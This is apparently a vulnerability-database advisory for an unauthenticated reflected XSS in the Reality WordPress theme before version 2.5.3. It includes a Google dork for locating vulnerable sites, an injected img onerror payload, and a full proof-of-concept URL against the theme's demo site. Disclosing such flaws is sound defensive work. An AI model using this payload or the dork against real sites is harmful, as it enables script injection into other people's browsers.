Reality < 2.5.3 - Unauthenticated Reflected XSS

2020-02-07T00:00:00
ID WPEX-ID:10064
Type wpexploit
Reporter m0ze
Modified 2020-07-29T00:00:00

Description

WordPress Vulnerability - Reality < 2.5.3 - Unauthenticated Reflected XSS

                                        
                                            ----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/
Google Dork: /wp-content/themes/reality/


----[]- Reflected XSS: -[]----
Payload Sample: "&gt;&lt;img src=x onerror=(alert)(`m0ze`);//"&gt;

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=